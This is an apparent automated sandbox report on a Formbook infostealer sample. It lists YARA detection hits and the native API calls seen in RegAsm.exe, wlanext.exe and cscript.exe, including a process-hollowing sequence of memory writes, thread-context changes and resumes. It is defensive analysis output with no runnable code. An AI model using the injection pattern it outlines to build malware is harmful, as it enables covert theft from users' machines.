Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00418180 NtCreateFile,	2_2_00418180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00418230 NtReadFile,	2_2_00418230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004182B0 NtClose,	2_2_004182B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00418360 NtAllocateVirtualMemory,	2_2_00418360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041822A NtReadFile,	2_2_0041822A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004182AA NtClose,	2_2_004182AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041835E NtAllocateVirtualMemory,	2_2_0041835E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_03059A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059A20 NtResumeThread,LdrInitializeThunk,	2_2_03059A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059A50 NtCreateFile,LdrInitializeThunk,	2_2_03059A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_03059910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030599A0 NtCreateSection,LdrInitializeThunk,	2_2_030599A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059840 NtDelayExecution,LdrInitializeThunk,	2_2_03059840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03059860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030598F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_030598F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059710 NtQueryInformationToken,LdrInitializeThunk,	2_2_03059710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059780 NtMapViewOfSection,LdrInitializeThunk,	2_2_03059780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030597A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_030597A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059FE0 NtCreateMutant,LdrInitializeThunk,	2_2_03059FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_03059660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030596E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_030596E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059540 NtReadFile,LdrInitializeThunk,	2_2_03059540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030595D0 NtClose,LdrInitializeThunk,	2_2_030595D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059B00 NtSetValueKey,	2_2_03059B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0305A3B0 NtGetContextThread,	2_2_0305A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059A10 NtQuerySection,	2_2_03059A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059A80 NtOpenDirectoryObject,	2_2_03059A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059950 NtQueueApcThread,	2_2_03059950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030599D0 NtCreateProcessEx,	2_2_030599D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059820 NtEnumerateKey,	2_2_03059820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0305B040 NtSuspendThread,	2_2_0305B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030598A0 NtWriteVirtualMemory,	2_2_030598A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0305A710 NtOpenProcessToken,	2_2_0305A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059730 NtQueryVirtualMemory,	2_2_03059730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059760 NtOpenProcess,	2_2_03059760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059770 NtSetInformationFile,	2_2_03059770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0305A770 NtOpenThread,	2_2_0305A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059610 NtEnumerateValueKey,	2_2_03059610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059650 NtQueryValueKey,	2_2_03059650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059670 NtQueryInformationProcess,	2_2_03059670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030596D0 NtCreateKey,	2_2_030596D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059520 NtWaitForSingleObject,	2_2_03059520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0305AD30 NtSetContextThread,	2_2_0305AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03059560 NtWriteFile,	2_2_03059560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030595F0 NtQueryInformationFile,	2_2_030595F0
Source: C:\Users\user\Desktop\NQQWym075C.exe	Code function: 4_2_05FD00AD NtOpenSection,NtMapViewOfSection,	4_2_05FD00AD
Source: C:\Users\user\Desktop\NQQWym075C.exe	Code function: 4_2_05FD1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,	4_2_05FD1C09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00418180 NtCreateFile,	5_2_00418180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00418230 NtReadFile,	5_2_00418230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004182B0 NtClose,	5_2_004182B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00418360 NtAllocateVirtualMemory,	5_2_00418360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041822A NtReadFile,	5_2_0041822A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004182AA NtClose,	5_2_004182AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041835E NtAllocateVirtualMemory,	5_2_0041835E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39A50 NtCreateFile,LdrInitializeThunk,	5_2_02F39A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39A20 NtResumeThread,LdrInitializeThunk,	5_2_02F39A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39A00 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_02F39A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F398F0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_02F398F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39860 NtQuerySystemInformation,LdrInitializeThunk,	5_2_02F39860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39840 NtDelayExecution,LdrInitializeThunk,	5_2_02F39840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F399A0 NtCreateSection,LdrInitializeThunk,	5_2_02F399A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39910 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_02F39910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F396E0 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_02F396E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39660 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_02F39660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39FE0 NtCreateMutant,LdrInitializeThunk,	5_2_02F39FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F397A0 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_02F397A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39780 NtMapViewOfSection,LdrInitializeThunk,	5_2_02F39780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39710 NtQueryInformationToken,LdrInitializeThunk,	5_2_02F39710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F395D0 NtClose,LdrInitializeThunk,	5_2_02F395D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39540 NtReadFile,LdrInitializeThunk,	5_2_02F39540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39A80 NtOpenDirectoryObject,	5_2_02F39A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39A10 NtQuerySection,	5_2_02F39A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F3A3B0 NtGetContextThread,	5_2_02F3A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39B00 NtSetValueKey,	5_2_02F39B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F398A0 NtWriteVirtualMemory,	5_2_02F398A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F3B040 NtSuspendThread,	5_2_02F3B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39820 NtEnumerateKey,	5_2_02F39820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F399D0 NtCreateProcessEx,	5_2_02F399D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39950 NtQueueApcThread,	5_2_02F39950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F396D0 NtCreateKey,	5_2_02F396D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39670 NtQueryInformationProcess,	5_2_02F39670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39650 NtQueryValueKey,	5_2_02F39650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39610 NtEnumerateValueKey,	5_2_02F39610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39770 NtSetInformationFile,	5_2_02F39770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F3A770 NtOpenThread,	5_2_02F3A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39760 NtOpenProcess,	5_2_02F39760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39730 NtQueryVirtualMemory,	5_2_02F39730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F3A710 NtOpenProcessToken,	5_2_02F3A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F395F0 NtQueryInformationFile,	5_2_02F395F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39560 NtWriteFile,	5_2_02F39560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F3AD30 NtSetContextThread,	5_2_02F3AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F39520 NtWaitForSingleObject,	5_2_02F39520
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759A50 NtCreateFile,LdrInitializeThunk,	6_2_03759A50
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759910 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_03759910
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037599A0 NtCreateSection,LdrInitializeThunk,	6_2_037599A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759860 NtQuerySystemInformation,LdrInitializeThunk,	6_2_03759860
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759840 NtDelayExecution,LdrInitializeThunk,	6_2_03759840
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759710 NtQueryInformationToken,LdrInitializeThunk,	6_2_03759710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759FE0 NtCreateMutant,LdrInitializeThunk,	6_2_03759FE0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759780 NtMapViewOfSection,LdrInitializeThunk,	6_2_03759780
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759660 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_03759660
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759650 NtQueryValueKey,LdrInitializeThunk,	6_2_03759650
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037596E0 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_037596E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037596D0 NtCreateKey,LdrInitializeThunk,	6_2_037596D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759540 NtReadFile,LdrInitializeThunk,	6_2_03759540
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037595D0 NtClose,LdrInitializeThunk,	6_2_037595D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759B00 NtSetValueKey,	6_2_03759B00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0375A3B0 NtGetContextThread,	6_2_0375A3B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759A20 NtResumeThread,	6_2_03759A20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759A10 NtQuerySection,	6_2_03759A10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759A00 NtProtectVirtualMemory,	6_2_03759A00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759A80 NtOpenDirectoryObject,	6_2_03759A80
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759950 NtQueueApcThread,	6_2_03759950
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037599D0 NtCreateProcessEx,	6_2_037599D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0375B040 NtSuspendThread,	6_2_0375B040
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759820 NtEnumerateKey,	6_2_03759820
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037598F0 NtReadVirtualMemory,	6_2_037598F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037598A0 NtWriteVirtualMemory,	6_2_037598A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0375A770 NtOpenThread,	6_2_0375A770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759770 NtSetInformationFile,	6_2_03759770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759760 NtOpenProcess,	6_2_03759760
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759730 NtQueryVirtualMemory,	6_2_03759730
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0375A710 NtOpenProcessToken,	6_2_0375A710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037597A0 NtUnmapViewOfSection,	6_2_037597A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759670 NtQueryInformationProcess,	6_2_03759670
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759610 NtEnumerateValueKey,	6_2_03759610
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759560 NtWriteFile,	6_2_03759560
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0375AD30 NtSetContextThread,	6_2_0375AD30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03759520 NtWaitForSingleObject,	6_2_03759520
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_037595F0 NtQueryInformationFile,	6_2_037595F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03258360 NtAllocateVirtualMemory,	6_2_03258360
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03258230 NtReadFile,	6_2_03258230
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_032582B0 NtClose,	6_2_032582B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03258180 NtCreateFile,	6_2_03258180
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0325835E NtAllocateVirtualMemory,	6_2_0325835E
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0325822A NtReadFile,	6_2_0325822A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_032582AA NtClose,	6_2_032582AA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D95D0 NtClose,LdrInitializeThunk,	10_2_047D95D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9660 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_047D9660
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D96E0 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_047D96E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9FE0 NtCreateMutant,LdrInitializeThunk,	10_2_047D9FE0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9860 NtQuerySystemInformation,LdrInitializeThunk,	10_2_047D9860
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	10_2_047D9910
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9560 NtWriteFile,	10_2_047D9560
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9540 NtReadFile,	10_2_047D9540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047DAD30 NtSetContextThread,	10_2_047DAD30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9520 NtWaitForSingleObject,	10_2_047D9520
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D95F0 NtQueryInformationFile,	10_2_047D95F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9670 NtQueryInformationProcess,	10_2_047D9670
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9650 NtQueryValueKey,	10_2_047D9650
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9610 NtEnumerateValueKey,	10_2_047D9610
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D96D0 NtCreateKey,	10_2_047D96D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047DA770 NtOpenThread,	10_2_047DA770
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9770 NtSetInformationFile,	10_2_047D9770
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9760 NtOpenProcess,	10_2_047D9760
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9730 NtQueryVirtualMemory,	10_2_047D9730
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047DA710 NtOpenProcessToken,	10_2_047DA710
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9710 NtQueryInformationToken,	10_2_047D9710
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D97A0 NtUnmapViewOfSection,	10_2_047D97A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9780 NtMapViewOfSection,	10_2_047D9780
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047DB040 NtSuspendThread,	10_2_047DB040
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9840 NtDelayExecution,	10_2_047D9840
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9820 NtEnumerateKey,	10_2_047D9820
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D98F0 NtReadVirtualMemory,	10_2_047D98F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D98A0 NtWriteVirtualMemory,	10_2_047D98A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9950 NtQueueApcThread,	10_2_047D9950
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D99D0 NtCreateProcessEx,	10_2_047D99D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D99A0 NtCreateSection,	10_2_047D99A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9A50 NtCreateFile,	10_2_047D9A50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9A20 NtResumeThread,	10_2_047D9A20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9A10 NtQuerySection,	10_2_047D9A10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9A00 NtProtectVirtualMemory,	10_2_047D9A00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9A80 NtOpenDirectoryObject,	10_2_047D9A80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047D9B00 NtSetValueKey,	10_2_047D9B00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047DA3B0 NtGetContextThread,	10_2_047DA3B0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_029782B0 NtClose,	10_2_029782B0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_02978230 NtReadFile,	10_2_02978230
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_02978360 NtAllocateVirtualMemory,	10_2_02978360
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_02978180 NtCreateFile,	10_2_02978180
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_029782AA NtClose,	10_2_029782AA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_0297822A NtReadFile,	10_2_0297822A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_0297835E NtAllocateVirtualMemory,	10_2_0297835E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041B99F	2_2_0041B99F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041CB27	2_2_0041CB27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00408C2C	2_2_00408C2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00408C30	2_2_00408C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041C53B	2_2_0041C53B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00402D88	2_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041BD88	2_2_0041BD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E2B28	2_2_030E2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303AB40	2_2_0303AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304EBB0	2_2_0304EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D03DA	2_2_030D03DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030DDBD2	2_2_030DDBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030CFA2B	2_2_030CFA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E22AE	2_2_030E22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301F900	2_2_0301F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03034120	2_2_03034120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D1002	2_2_030D1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030EE824	2_2_030EE824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0302B090	2_2_0302B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030420A0	2_2_030420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E20A8	2_2_030E20A8
